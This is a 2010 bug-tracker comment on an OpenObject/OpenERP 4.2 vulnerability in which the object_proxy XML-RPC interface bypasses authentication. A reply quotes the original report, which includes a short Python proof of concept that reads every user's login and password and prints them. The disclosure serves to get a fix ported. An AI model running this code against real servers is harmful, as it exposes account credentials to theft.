Comment 6 for bug 452373

I tried to use this and I can not replicate this bug, can you guide me
please!

2010/4/26 Eduard Carreras i Nadal <email address hidden>

> Today, 4 months after the vulnerability still there...
>
> I re-attach the exploit...
>
> ** Attachment added: "get_all_users_pass.py"
> http://launchpadlibrarian.net/45524184/get_all_users_pass.py
>
> --
> [4.2] Netsvc object_proxy bypass
> https://bugs.launchpad.net/bugs/452373
> You received this bug notification because you are subscribed to
> OpenObject.
>
> Status in OpenObject Server: Invalid
>
> Bug description:
> It's possible to call any method of object xml-rpc interface using another
> interface called object_proxy. The only requisit is that server is
> initialitzed (eg. someone do the login or tries to login).
>
> This is solved in 5.0 but not in 4.2.
> In bazaar 4.2 is tagged as mature and I can't undersant why this patch is
> not ported to this branch.
>
> I attach a simple patch that we use in our production servers which
> someones still working on 4.2 version.
>
> Proof of concept:
>
> sock = xmlrpclib.ServerProxy('http://127.0.0.1:8069/xmlrpc/object_proxy')
> ids = sock.execute('terp', 1, 'res.users', 'search', [])
> f = sock.execute('terp', 1, 'res.users', 'read', ids, ['id', 'login',
> 'password'])
> for u in f:
> print ' user: %s pass: %s' % (u['login'], u['password'])
>
>
>

--
Saludos Cordiales

Nhomar G. Hernandez M.
+58-414-4110269
+58-212-6615932
+58-212-9536734 ext 124
+58-212-9512643
Web-Blog: http://geronimo.com.ve
Servicios IT: http://openerp.netquatro.com
Linux-Counter: 467724
Correos:
<email address hidden>
<email address hidden>